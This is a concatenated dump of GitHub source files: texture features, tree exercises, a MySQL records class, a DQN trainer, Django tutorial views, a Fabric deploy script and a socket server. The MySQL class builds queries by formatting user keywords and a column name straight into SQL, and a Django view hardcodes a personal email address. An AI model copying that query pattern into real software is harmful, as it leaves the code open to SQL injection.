Generate array of [var, cov, std] matrices from each class\n if self.scope == 'intraclass':\n if self.mahalanobis_type == 'var':\n class_matrix.append(np.var(img_features, axis=0))\n elif self.mahalanobis_type == 'std':\n class_matrix.append(np.std(img_features, axis=0))\n elif self.mahalanobis_type == 'cov':\n class_matrix.append(np.cov(img_features, rowvar=False))\n class_means[img_class] = np.mean(img_features, axis=0)\n train_features.extend(img_features)\n\n if self.scope == 'stsim_i':\n train_features = []\n for train_idx in train_split:\n normalized_feature = self.features[train_idx] - \\\n class_means[self.labels[train_idx]]\n train_features.append(normalized_feature)\n\n # Flatten training array for computing global M matrix for\n if self.scope in ('global', 'stsim_i'):\n if self.mahalanobis_type == 'std':\n self.mahalanobis_matrix = np.diag(\n np.std(train_features, axis=0))\n elif self.mahalanobis_type == 'var':\n self.mahalanobis_matrix = np.diag(\n np.var(train_features, axis=0))\n elif self.mahalanobis_type == 'cov':\n self.mahalanobis_matrix = np.cov(train_features, rowvar=False)\n # Compute single M matrix from individual class M matrices\n elif self.scope in ['intraclass', 'cluster']:\n if self.mahalanobis_type in ['std', 'var']:\n self.mahalanobis_matrix = np.diag(\n np.mean(class_matrix, axis=0))\n elif self.mahalanobis_type == 'cov':\n self.mahalanobis_matrix = np.mean(class_matrix, axis=0)\n if self.mahalanobis_file:\n np.save(self.mahalanobis_file, self.mahalanobis_matrix)\n\n\nclass LocalBinaryPattern(TextureFeature):\n def __init__(self, image_dir_or_saved_bin, class_cnt, save_features, scale_invariance,\n fold_cnt, n_points, radius, lbp_method):\n self.n_points = n_points\n self.radius = radius\n self.lbp_method = lbp_method\n super().__init__(image_dir_or_saved_bin, class_cnt, save_features, fold_cnt)\n\n def compute_similarity(self, feature_1, feature_2):\n return entropy(feature_1, feature_2)\n\n def generate_feature(self, image_path):\n n_bins = 0\n img = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)\n lbp = local_binary_pattern(\n img, self.n_points, self.radius, method=self.lbp_method)\n n_bins = max(int(lbp.max() + 1), n_bins)\n lbp_hist = np.histogram(\n lbp, density=True, bins=n_bins, range=(0, n_bins))[0]\n return lbp_hist\n","repo_name":"JaredFern/stsim","sub_path":"TextureFeature.py","file_name":"TextureFeature.py","file_ext":"py","file_size_in_byte":12723,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"5"} +{"seq_id":"11262065406","text":"from tree_node import TreeNode\nimport random\n\n# Activity 1\ndef pretty_print_mod(root, indent=''):\n if root is None:\n return\n elif root.left is None:\n print(indent + str(root.val))\n pretty_print_mod(root.right, indent = indent+' ')\n print(f\"size() called on node {root.val}\")\n elif root.right is None:\n print(indent + str(root.val))\n pretty_print_mod(root.left, indent = indent+' ')\n x = tree_count(root.left)\n print(f\"size() called on node {root.val}\")\n elif root.right is None and root.left is None:\n print(indent + str(root.val))\n print(f\"size() called on node {root.val}\")\n else:\n print(indent + str(root.val))\n pretty_print_mod(root.right, indent = indent+' ')\n pretty_print_mod(root.left, indent = indent+' ')\n print(f\"size() called on node {root.val}\")\n print(f\"size() called on node {root.val}\")\n\ndef tree_count(root):\n '''\n Takes a tree as a parameter\n and returns the number of nodes\n in it.\n '''\n if root is None:\n return 0\n elif 
root.left is None:\n return 1 + tree_count(root.right)\n elif root.right is None:\n return 1 + tree_count(root.left)\n elif root.left is None and root.right is None:\n return 1\n else:\n return 1 + tree_count(root.left) + tree_count(root.right)\n\ndef random_insert(T):\n v = random.randint(0, 100)\n #x = random.randint(1, 2)\n if T == None:\n return TreeNode(v)\n elif v % 2 == 0:\n T.left = random_insert(T.left)\n elif v % 2 != 0:\n T.right = random_insert(T.right)\n return T\n\n# root = TreeNode(19)\n# for i in range(0, 19):\n# root = random_insert(root)\n#pretty_print_mod(root)\n# it gets called a lot of times, usually multiple times on the same node. This might cause problems later.\n\n# Activity 2\n# root = TreeNode(13)\n# root.left = TreeNode(26)\n# root.left.left = TreeNode(11)\n# root.left.left.left = TreeNode(80)\n\ndef fill_up_size_fields(root):\n if root is None:\n return 0\n size = 1\n if root.left is not None:\n fill_up_size_fields(root.left)\n size += root.left.size\n if root.right is not None:\n fill_up_size_fields(root.right)\n size += root.right.size\n root.size = size\n\n# Activity 3\n# In this case, the function would fail because some of the nodes would not have a size parameter associated with them.\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n self.size = 1 # the initial value should be one because this node has no children inititally\n# No we cannot, since the random tree building will add new nodes into spots where there were previously None, therefore causing our size parameter to display incorrect information.\ndef fill_up_size_fields_updated(root):\n if root is None:\n return 0\n else:\n if root.size is not None:\n return root.size\n root.size = 1 + fill_up_size_fields_updated(root.left) + fill_up_size_fields_updated(root.right)\n return root.size\n\n# Word of the day : Caching\n\n","repo_name":"avichalk/csc_120","sub_path":"In-Class/mar/15/h.py","file_name":"h.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71545025753","text":"import numpy as np\nfrom scipy.linalg import toeplitz\nimport matplotlib.pyplot as plt\n\ndef Initialize(A, B, n, h):\n x = np.linspace(A, B, n)\n init_cond = np.sin(x) + 1/10 * np.sin(10*x)\n return init_cond, x\n\ndef ImplMatrix(r, n, h):\n row = np.zeros(n)\n row[0] = 1 + 2*r \n row[1] = -r\n\n mat = toeplitz(row) \n return mat\n\ndef Update(old, new):\n old = new\n return old\n\ndef Plot(x, data1, lbl1, data2, lbl2, a, itr):\n plot = plt.figure()\n plt.axvline(linewidth=0.5, color='black')\n plt.axhline(linewidth=0.5, color='black')\n plt.grid(axis='both')\n plt.title('koeficient difuse {} iterace {}'.format(a, itr))\n subplot = plot.add_subplot(111)\n\n axes = plt.gca()\n axes.set_xlim([0,2*3.1415926])\n plt.plot(x, data1, label=lbl1, \n linewidth=0.8, color='green')\n plt.plot(x, data2, label=lbl2, \n linewidth=0.8, color='red')\n plt.legend()\n plt.savefig('./results/a_{}/iter_{}.png'.format(a, itr), bbox_inches='tight')\n","repo_name":"david-moravec/homeworks","sub_path":"zapocet/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29298841084","text":"import mysql.connector\nfrom conexion import *\n\n\nclass NormativaBD():\n def __init__(self):\n #self.conexion = mysql.connector.connect(host=\"localhost\", user=\"root\", passwd=\"admin\", 
database=\"bdnormativas\")\n self.conexion = MySQLConnection(\"localhost\",\"root\",\"admin\", \"bdnormativas\", \"3306\")\n\n def obtenerTipoNormativa(self):\n self.conexion.connect()\n cursor = self.conexion.cursor()\n cursor.execute(\"SELECT * FROM TipoNormativa\")\n tipoNormativas = cursor.fetchall()\n y=0\n x=0\n for i in tipoNormativas:\n print(tipoNormativas[y][0], tipoNormativas[y][1])\n y+=1\n self.conexion.close()\n\n def insertarNuevaNormativa(self, idTipoNormativa, nroNormativa, fecha, descripcion, categoria, idTipoJurisdiccion, palabrasClave):\n self.conexion.connect()\n cursor = self.conexion.cursor()\n sql = \"INSERT INTO normativa(idTipoNormativa, fecha, descripcion, palabrasClaves, idTipoJurisdiccion, nroNormativa, idCategoria) VALUES (%s,%s,%s,%s,%s,%s,%s)\"\n cursor.execute(sql,(idTipoNormativa, fecha, descripcion, palabrasClave, idTipoJurisdiccion, nroNormativa, categoria))\n self.conexion.commit()\n cursor.close()\n self.conexion.close()\n\n def consultarNormativas(self):\n self.conexion.connect()\n cursor=self.conexion.cursor()\n cursor.execute(\"SELECT * FROM normativa\")\n normativas = cursor.fetchall()\n y=0\n x=0\n for i in normativas:\n linea= \"\"\n for x in range (8):\n linea += str(normativas[y][x]) + \" | \"\n y+=1\n print(linea)\n return\n \n def obtenerNormativaPorNroNormativa(self,nroNormativa):\n self.conexion.connect()\n cursor=self.conexion.cursor()\n cursor.execute(\"SELECT * FROM normativa WHERE nroNormativa=%s\" , (nroNormativa,) ) \n normativas=cursor.fetchall() \n y=0\n x=0\n for i in normativas:\n linea= \"\"\n for x in range (8):\n linea += str(normativas[y][x]) + \" | \"\n y+=1\n print(i)\n return\n\n\n\n def eliminarNormativa(self, nroRegistro):\n self.conexion.connect()\n cursor = self.conexion.cursor()\n cursor.execute(\"DELETE FROM normativa WHERE nroRegistro=%s\", (nroRegistro,))\n self.conexion.commit()\n print(\"Fue eliminado exitosamente\")\n\n \n def buscar_pclave(self, palabras_clave):\n self.conexion.connect()\n cursor = self.conexion.cursor()\n query = \"SELECT * FROM normativa WHERE \"\n conditions = []\n for palabra in palabras_clave:\n conditions.append(\"LOWER(palabrasClaves) LIKE '%{}%'\".format(palabra))\n query += \" OR \".join(conditions)\n cursor.execute(query)\n results = cursor.fetchall()\n for row in results:\n print(row)\n\n def obtenerCategorias(self):\n self.conexion.connect()\n cursor = self.conexion.cursor()\n cursor.execute(\"SELECT * from categoria\")\n categorias = cursor.fetchall()\n y=0\n x=0\n for i in categorias:\n for x in range (2):\n print(categorias[y][x])\n y+=1\n return\n \n def obtenerJurisdicciones(self):\n self.conexion.connect()\n cursor = self.conexion.cursor()\n cursor.execute(\"SELECT * from tipoJurisdiccion\")\n jurisdicciones = cursor.fetchall()\n y=0\n x=0\n for i in jurisdicciones:\n for x in range (2):\n print(jurisdicciones[y][x])\n y+=1\n return\n \n def actualizar_campo(self, registro_id, campo, nuevo_valor):\n self.conexion.connect()\n query = \"UPDATE categoria SET {} = %s WHERE idcategoria = %s\".format(campo)\n valores = (nuevo_valor, registro_id)\n cursor = self.conexion.cursor()\n cursor.execute(query, valores)\n self.conexion.commit()\n if cursor.rowcount > 0:\n print(\"Campo actualizado exitosamente.\")\n else:\n print(\"No se encontró el registro o no se realizaron 
cambios.\")\n","repo_name":"ISCP-2023-equipo-estudio/Grupo_estudio_TSDWAD","sub_path":"Python/normativaBD.py","file_name":"normativaBD.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"22521700628","text":"import numpy as np\nimport sys\n\nif (len(sys.argv) < 1):\n print('Usage:')\n print('python fastest_rectangle.py namefile')\n exit(1)\n\nfastest = 999999999.99\n\nwith open(sys.argv[1], 'r') as f:\n f.readline()\n for l in f.readlines():\n line = l.replace('\\n', '').split(' ')\n if (float(line[6]) < fastest):\n fastest = float(line[6])\n result = l\nprint(l)\n","repo_name":"LoniasGR/embed19-20","sub_path":"Lab1/Part1/scripts/fastest_rectangle.py","file_name":"fastest_rectangle.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"42274534716","text":"from django.shortcuts import render\nfrom django.http import HttpResponse,HttpResponseNotFound\nimport datetime\nfrom django.views.decorators.http import require_http_methods\n\n#http decorator\n@require_http_methods([\"GET\"])\ndef showpg(request): \n return HttpResponse('

This is Http GET request.

')\n\n# loading templates\nfrom django.template import loader\ndef index(request): \n template = loader.get_template('index.html') # getting our template \n name={\n 'student':'Dk','class':'MCA'\n }\n return HttpResponse(template.render(name)) # rendering the template in HttpResponse \n\n# Create your views here.\ndef myfn(request):\n return HttpResponse('

This is my first Django project

')\ndef index3(request):\n tim=datetime.datetime.now()\n html=\"

Now Time is %s

\"%tim\n return HttpResponse(html)\ndef index2(request):\n a=1\n if a:\n return HttpResponseNotFound(\"

Not found

\")\n else:\n return HttpResponse(\"

page found

\")\n\n#loading image using static\ndef imag(request):\n return render(request,'imag.html')\n#loading js file using static\ndef js_file(request):\n return render(request,'script.html')\n#loading css file using static\ndef cs(request):\n return render(request,'cs.html')\n\n#loading model form\nfrom myapp.form import EmpForm\n\ndef inde(request):\n emp=EmpForm()\n return render(request,\"inde.html\",{'form':emp})\n\n\nfrom myapp.form import StudentForm \n \ndef inde2(request): \n student = StudentForm() \n return render(request,\"inde.html\",{'form':student}) \n\n#django validation\ndef emp(request): \n if request.method == \"POST\": \n form = EmpForm(request.POST) \n if form.is_valid(): \n try: \n return redirect('/') \n except: \n pass \n else: \n form = EmpForm() \n return render(request,'inde.html',{'form':form})\n\n#file upload\nfrom myapp.functions.functions import handle_uploaded_file\nfrom myapp.form import StudForm \ndef filep(request): \n if request.method == 'POST': \n student = StudForm(request.POST, request.FILES) \n if student.is_valid(): \n handle_uploaded_file(request.FILES['file']) \n return HttpResponse(\"File uploaded successfuly\") \n else: \n student = StudForm() \n return render(request,\"inde.html\",{'form':student}) \n\n#creating csv with django\nimport csv\ndef getfile(request):\n response=HttpResponse(content_type='text/csv')\n response['Content-Disposition']='attachment;filename=\"file.csv\"'\n writer = csv.writer(response) \n writer.writerow(['1001', 'John', 'Domil', 'CA']) \n writer.writerow(['1002', 'Amit', 'Mukharji', 'LA', '\"Testing\"']) \n return response \n\n#dynamic csv using django\nfrom myapp.models import Employee\ndef getdt(request):\n response=HttpResponse(content_type='text/csv')\n response['Content-Disposition']='attachment;filename=\"file2.csv\"'\n employees= Employee.objects.all()\n writer =csv.writer(response)\n for employee in employees:\n writer.writerow([employee.first_name,employee.last_name,employee.mbl])\n return response\n\n#using pdf in django\nfrom reportlab.pdfgen import canvas\ndef getpdf(request): \n response = HttpResponse(content_type='application/pdf') \n response['Content-Disposition'] = 'attachment; filename=\"sampl.pdf\"' \n p = canvas.Canvas(response) \n p.setFont(\"Times-Roman\", 55) \n p.drawString(100,700, \"my first pdf creaton\") \n p.showPage() \n p.save() \n return response \n\n#bootstrap\ndef boot(request):\n return render(request,'boots.html')\n\n#setting up mails\nfrom djangoapp import settings\nfrom django.core.mail import send_mail\n\ndef mails(request):\n sub=\"Greetings\"\n msg=\"Congratulations for your success dear lusu!! 
:)\"\n to=\"saidharanisai143@gmail.com\"\n res=send_mail(sub,msg,settings.EMAIL_HOST_USER,[to])\n if(res==1):\n msg=\"Mail sent successfully\"\n else:\n \"Mail could not sent\"\n return HttpResponse(msg)","repo_name":"dinskutty/Django_app","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37383463735","text":"'''\n1) 가장 짧은 길이 1을 start로, 랜선 중 가장 긴 길이를 end로 둔다.\n\n2) 이분탐색이 끝날 때까지 while 문을 돌린다.\n\n3) mid를 start와 end의 중간으로 두고, 모든 랜선 값을 mid로 나누어 총 몇개의 랜선이 나오나 살펴본다.\n\n4-1) 랜선이 목표치 이상이면 mid+1을 start로 두고 다시 while문 반복\n\n4-2) 랜선이 목표치 이하면 mid-1을 end로 두고 다시 while문 반복\n\n5) start와 end가 같아지면: 조건을 만족하는 최대의 랜선길이를 찾으면 탈출한다.\n\n6) 결과값인 end출력\n'''\n\nimport sys\n\nk, n = map(int, input().split())\nlan = [int(sys.stdin.readline()) for _ in range(k)]\nstart, end = 1, max(lan)\n\nwhile start <= end:\n mid = (start + end)//2\n lines = 0\n for i in lan:\n lines += i // mid\n if lines >= n:\n start = mid + 1\n else:\n end = mid - 1\nprint(end)\n","repo_name":"songhee-lee/2023-python-coding-test","sub_path":"이것이 코딩테스트다/5. Binary Search/sukkyeong/정렬이진탐색/5.랜선자르기.py","file_name":"5.랜선자르기.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"42032063591","text":"def back_in_black_chapter_1():\n N = int(input())\n S = list(map(int, input()))\n Q = [int(input())-1 for _ in range(int(input()))]\n cnt = [0]*N\n for x in Q:\n cnt[x] ^= 1\n for i in range(N):\n if cnt[i] == 0:\n continue\n for j in range(i, N, i+1):\n S[j] ^= 1\n result = 0\n for i in range(N):\n if S[i] == 0:\n continue\n for j in range(i, N, i+1):\n S[j] ^= 1\n result += 1\n return result\n\nfor case in range(int(input())):\n print('Case #%d: %s' % (case+1, back_in_black_chapter_1()))\n","repo_name":"kamyu104/MetaHackerCup-2023","sub_path":"Round 1/back_in_black_chapter_1.py3","file_name":"back_in_black_chapter_1.py3","file_ext":"py3","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"11491412209","text":"import gym\nimport math\nimport random\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom collections import namedtuple\nfrom itertools import count\nfrom PIL import Image\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torchvision.transforms as T\nfrom torch.autograd import Variable\n\n\nfrom gym_minigrid.wrappers import *\nfrom collections import deque\n\nfrom gym_minigrid.window import Window\nfrom torch.utils.tensorboard import SummaryWriter\n\nenvs_to_run = [\n'MiniGrid-DoorKey-16x16-v0',\n 'MiniGrid-KeyCorridorS3R3-v0',\n 'MiniGrid-BlockedUnlockPickup-v0',\n 'MiniGrid-Unlock-v0',\n 'MiniGrid-Fetch-8x8-N3-v0',\n 'MiniGrid-Fetch-5x5-N2-v0',\n 'MiniGrid-Empty-8x8-v0',\n 'MiniGrid-FourRooms-v0',\n 'MiniGrid-SimpleCrossingS9N1-v0',\n 'MiniGrid-MultiRoom-N2-S4-v0',\n]\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nTransition = namedtuple('Transition', ('state', 'action', 'reward', 'next_state', 'done'))\n\n\n\nclass ReplayBuffer(object):\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.memory = []\n self.position = 0\n\n def push(self, *args):\n \"\"\"Saves a transition.\"\"\"\n if len(self.memory) < self.capacity:\n self.memory.append(None)\n self.memory[self.position] = Transition(*args)\n 
self.position = (self.position + 1) % self.capacity\n\n def sample(self, batch_size):\n transitions = random.sample(self.memory, batch_size)\n batch = Transition(*zip(*transitions))\n\n # Compute a mask of non-final states and concatenate the batch elements\n # (a final state would've been the one after which simulation ended)\n non_final_mask = torch.tensor(\n tuple(map(lambda s: s is not None, batch.next_state)), device=device, dtype=torch.bool)\n non_final_next_states = torch.cat(\n [s for s in batch.next_state if s is not None])\n state_batch = torch.cat(batch.state)\n action_batch = torch.cat(batch.action)\n reward_batch = torch.tensor(batch.reward, dtype=torch.float32)\n return state_batch,action_batch, reward_batch, non_final_next_states, torch.tensor(batch.done, dtype=torch.int64), non_final_mask\n\n def __len__(self):\n return len(self.memory)\n\n\nclass ConvDQN(nn.Module):\n\n def __init__(self, h, w, outputs):\n super(ConvDQN, self).__init__()\n self.conv1 = nn.Conv2d(1, 16, kernel_size=5, stride=2)\n self.bn1 = nn.BatchNorm2d(16)\n self.conv2 = nn.Conv2d(16, 32, kernel_size=5, stride=2)\n self.bn2 = nn.BatchNorm2d(32)\n self.conv3 = nn.Conv2d(32, 32, kernel_size=5, stride=2)\n self.bn3 = nn.BatchNorm2d(32)\n\n def conv2d_size_out(size, kernel_size=5, stride=2):\n return (size - (kernel_size - 1) - 1) // stride + 1\n\n convw = conv2d_size_out(conv2d_size_out(conv2d_size_out(w)))\n convh = conv2d_size_out(conv2d_size_out(conv2d_size_out(h)))\n linear_input_size = convw * convh * 32\n self.head = nn.Linear(linear_input_size, outputs)\n\n def forward(self, x):\n x = F.relu(self.bn1(self.conv1(x)))\n x = F.relu(self.bn2(self.conv2(x)))\n x = F.relu(self.bn3(self.conv3(x)))\n return self.head(x.view(x.size(0), -1))\n\n\ndef init_env(env_name):\n env = gym.make(env_name)\n env.max_steps = 256\n window = Window('gym_minigrid - ' + env_name)\n return env, window\n\n\ndef process_frames(env):\n\n resize = T.Compose([T.ToPILImage(),\n T.Resize((64,64), interpolation=Image.CUBIC),\n T.Grayscale(),\n T.ToTensor()])\n screen = env.render(mode='rgb_array').transpose((2, 0, 1))\n _, screen_height, screen_width = screen.shape\n screen = torch.tensor(screen)\n return resize(screen).unsqueeze(0).to(device)\n\n\ndef select_action(state, params, policy_net, n_actions, steps_done):\n sample = random.random()\n eps_threshold = params['eps_end'] + (params['eps_start'] - params['eps_end']) * \\\n math.exp(-1. 
* steps_done / params['eps_decay'])\n steps_done += 1\n if sample > eps_threshold:\n with torch.no_grad():\n return policy_net(state).max(1)[1].view(1, 1), steps_done\n else:\n return torch.tensor([[random.randrange(n_actions)]], device=device, dtype=torch.long), steps_done\n\n\ndef compute_td_loss(model, replay_buffer,params ,batch_size=32):\n\n state, action, reward, next_state, done, non_final_mask = replay_buffer.sample(batch_size)\n\n state = state.to(device)\n next_state = next_state.to(device)\n action = action.to(device)\n reward = reward.to(device)\n done = done.to(device)\n\n q_values = model(state)\n next_q_values = torch.zeros(batch_size, device=device)\n next_q_values[non_final_mask] = model(next_state).max(1)[0]\n\n q_value = q_values.gather(1, action).squeeze(1)\n expected_q_value = reward + params['gamma'] * next_q_values * (1 - done)\n\n loss = (q_value - Variable(expected_q_value.data)).pow(2).mean()\n\n params['optimizer'].zero_grad()\n loss.backward()\n params['optimizer'].step()\n\n return loss\n\n\ndef train(env, model, replay_buffer, params, writer, num_episodes=10000):\n episode_durations = []\n\n steps_done = 0\n counter = 0\n for i_episode in range(num_episodes):\n # Initialize the environment and state\n env.reset()\n state = process_frames(env)\n rew_ep = 0\n loss_ep = 0\n losses = []\n for t in count():\n # Select and perform an action\n action, steps_done = select_action(state, params, model, env.action_space.n, steps_done)\n\n _, reward, done, _ = env.step(action.item())\n reward = torch.tensor([reward], device=device)\n\n rew_ep += reward.item()\n current_screen = process_frames(env)\n if not done:\n next_state = current_screen\n else:\n next_state = None\n\n # Store the transition in memory\n replay_buffer.push(state, action, reward, next_state, done)\n\n # Move to the next state\n prev_state = state\n state = next_state\n\n # Perform one step of the optimization (on the target network)\n if len(replay_buffer) > 32:\n loss_ep = compute_td_loss(model, replay_buffer, params)\n losses.append(loss_ep.item())\n writer.add_scalar('Loss/iter',loss_ep, counter)\n counter += 1\n\n if done:\n episode_durations.append(t + 1)\n writer.add_scalar('Reward/episode', rew_ep, i_episode)\n print(rew_ep)\n\n # fig, ax = plt.subplots()\n # plt.imshow(prev_state.squeeze(0).cpu().permute(1, 2, 0).squeeze(2).numpy(), interpolation='none')\n # plt.title('Last state')\n # writer.add_figure(tag='simple_dqn_last', figure=fig)\n #\n # plt.show()\n # writer.add_scalar('Ep duration', t+1, i_episode)\n loss = np.sum(losses)\n writer.add_scalar('Loss/episode', loss/(t+1), i_episode)\n\n break\n\n return\n\n\ndef main():\n params = {\n 'batch_size': 128,\n 'gamma': 0.999,\n 'eps_start': 0.9,\n 'eps_end':0.05,\n 'eps_decay': 200,\n 'target_update': 100\n }\n writer = SummaryWriter(f'deep_rl/dqn_conv_network_832_{device}_{params[\"gamma\"]}_{params[\"eps_start\"]}_{params[\"eps_end\"]}_{params[\"eps_decay\"]}')\n\n env, window = init_env(envs_to_run[0])\n env.see_through_walls = False\n env.agent_view_size = 3\n init_screen = process_frames(env)\n env.reset()\n\n _, _, screen_height, screen_width = init_screen.shape\n n_actions = env.action_space.n\n\n model = ConvDQN(screen_height, screen_width, n_actions).to(device)\n\n optimizer = optim.Adam(model.parameters(), lr=0.00001)\n memory = ReplayBuffer(1000)\n params['optimizer'] = optimizer\n\n train(env, model, memory, params, writer)\n torch.save(model.state_dict(), 'dqn_conv_8x8.pt')\n return\n\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"CatarauCorina/creativai","sub_path":"relational_module/baseline_dqn.py","file_name":"baseline_dqn.py","file_ext":"py","file_size_in_byte":8206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74257393432","text":"import os\nimport sys\nimport torch\nimport subprocess\nfrom pathlib import Path\nfrom dataclasses import dataclass\n\nfrom torchbenchmark.util.e2emodel import E2EBenchmarkModel\n\nfrom typing import Optional, List\n\nCURRENT_DIR = Path(os.path.dirname(os.path.realpath(__file__)))\nFAMBENCH_ROOT = CURRENT_DIR.parent.parent.parent.joinpath(\"submodules\", \"FAMBench\")\n\ndef _create_data_dir(data_dir: str):\n data_dir = Path(data_dir)\n data_dir.mkdir(parents=True, exist_ok=True)\n return data_dir\n\ndef _get_fambench_test_root(name: str):\n xlmr_ootb_root = FAMBENCH_ROOT.joinpath(\"benchmarks\")\n assert xlmr_ootb_root.exists(), f\"Can't find FAMBench source at {xlmr_ootb_root.absolute()},\" \\\n \"please check out the submodules.\"\n return xlmr_ootb_root\n\n@dataclass\nclass FAMBenchXLMREvalConfig:\n \"\"\"\n Original config reference:\n https://github.com/facebookresearch/FAMBench/blob/main/benchmarks/run_xlmr_ootb.sh\n \"\"\"\n config_name = \"default-config\"\n nbatches = 10\n batchsize = 16\n seqlength = 16\n vocabsize = 250000\n warmupbatches = 1\n log_dir = os.path.join(CURRENT_DIR, \".data\", \"logs\")\n config_flags=[\"--inference-only\", f\"--num-batches={nbatches}\", f\"--batch-size={batchsize}\", \\\n f\"--sequence-length={seqlength}\", f\"--vocab-size={vocabsize}\", \\\n f\"--famconfig={config_name}\", \"--half-model\", f\"--warmup-batches={warmupbatches}\", \\\n f\"--logdir={log_dir}\"]\n\nclass Model(E2EBenchmarkModel):\n DEFAULT_EVAL_BSIZE = FAMBenchXLMREvalConfig.batchsize\n CANNOT_SET_CUSTOM_OPTIMIZER = True\n \n def __init__(self, test: str, batch_size: Optional[int]=None, extra_args: List[str]=[]):\n super().__init__(test=test, batch_size=batch_size, extra_args=extra_args)\n if not torch.cuda.is_available():\n raise NotImplementedError(\"FAMBench only support running on Nvidia GPU.\")\n self.device = \"cuda\"\n self.device_num = torch.cuda.device_count()\n self.name = \"xlmr\"\n self.implementation = \"ootb\"\n self.code_root = _get_fambench_test_root(self.name)\n if test == \"eval\":\n self.config = FAMBenchXLMREvalConfig()\n self.config.batchsize = self.batch_size\n self.num_examples = self.config.nbatches * self.batch_size\n _create_data_dir(self.config.log_dir)\n\n def train(self):\n raise NotImplementedError(\"FAMBench XLMR train is not implemented yet.\")\n\n def eval(self):\n prog_args = [sys.executable, f\"{self.name}/{self.implementation}/{self.name}.py\"]\n prog_args.extend(self.config.config_flags)\n subprocess.check_call(prog_args, cwd=self.code_root)\n","repo_name":"pytorch/benchmark","sub_path":"torchbenchmark/e2e_models/fambench_xlmr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":699,"dataset":"github-code","pt":"5"} +{"seq_id":"6841114968","text":"#!/usr/bin/python3\n\"\"\"This module contains a fabric based function that\ncreates and distributes an archive to web servers,\nusing the function deploy:\n\"\"\"\nfrom fabric.api import local, runs_once\nfrom datetime import datetime\nfrom os import path\nfrom fabric.api import run, env, put\n\n\nenv.hosts = ['100.25.45.230', '54.175.100.32']\n\n\n@runs_once\ndef do_pack():\n \"\"\"generates a .tgz archive from the 
contents of the web_static\n\n Functionality:\n - Creates a directory versions\n - Collects a file in we' '\n\n Returns:\n return the archive path if the archive has been correctly\n generated. Otherwise, it should return None\n \"\"\"\n date = str(datetime.utcnow().date()).replace('-', '')\n time = str(datetime.utcnow().time()).replace(':', '').split('.')[0]\n if time[0] == '0':\n time = time[1:]\n if not path.exists('versions'):\n local('mkdir -p versions')\n arch = \"versions/web_static_{}{}.tgz\".format(date, time)\n result = local('tar -cvzf {} web_static'.format(arch)).failed\n\n if path.exists(arch) and result is False:\n return arch\n else:\n return None\n\n\ndef do_deploy(archive_path):\n \"\"\"distributes an archive to web servers.\n\n args:\n archive_path: pathname to the archive to distribute.\n\n Functionality:\n - Uploads the archive to the /tmp/ directory of the web server\n - Uncompresses the archive to the folder /data/web_static/releases/\n on the web server\n - Deletes the archive from the web server\n - Deletes the symbolic link /data/web_static/current from the web server\n - Creates a new the symbolic link /data/web_static/current on the\n web server, linked to the new version of your code\n (/data/web_static/releases/)\n\n Returns:\n True if all operations have been done correctly, otherwise returns False\n \"\"\"\n if not path.exists(archive_path):\n return False\n\n filename = path.basename(archive_path)\n releases = \"/data/web_static/releases\"\n uncompfile = path.splitext(filename)[0]\n\n try:\n put(archive_path, '/tmp/')\n\n run('mkdir -p {}/{}'.format(releases, uncompfile))\n run('tar -xzf /tmp/{} -C {}/{}/'.format(filename, releases,\n uncompfile))\n\n run('rm /tmp/{}'.format(filename))\n\n run('rsync -a {}/{}/web_static/ {}/{}'.format(\n releases, uncompfile, releases, uncompfile))\n run('rm -rf {}/{}/web_static/'.format(releases, uncompfile))\n\n run('rm -rf /data/web_static/current')\n run('ln -s {}/{} /data/web_static/current'.format(releases,\n uncompfile))\n\n return True\n except Exception:\n return False\n\n\ndef deploy():\n \"\"\"creates and distributes an archive to web servers\"\"\"\n pathname = do_pack()\n if not pathname:\n return False\n return do_deploy(pathname)\n","repo_name":"Mcnores-Samuel/AirBnB_clone_v2","sub_path":"3-deploy_web_static.py","file_name":"3-deploy_web_static.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18048435162","text":"import socket\nimport select\nimport json\nfrom jsonparser import JsonParserClass\nimport time\n\nclass JSONSocketServer:\n global sock\n \"\"\" Simple socket server that listens to one single client. \"\"\"\n\n def __init__(self,host='0.0.0.0', port=2010):\n global sock\n \"\"\" Initialize the server with a host and port to listen to. \"\"\"\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.host = host\n self.port = port\n sock.bind((host, port))\n sock.listen(1)\n self._running = True\n self.json_parser_tool = JsonParserClass()\n\n def terminate(self):\n self._running = False\n\n def run(self):\n global haveSocketOpened\n while self._running:\n self.run_server()\n haveSocketOpened = False\n time.sleep(5)\n self.close()\n time.sleep(5)\n self.__init__()\n print('Exiting Socket Server')\n\n def close(self):\n 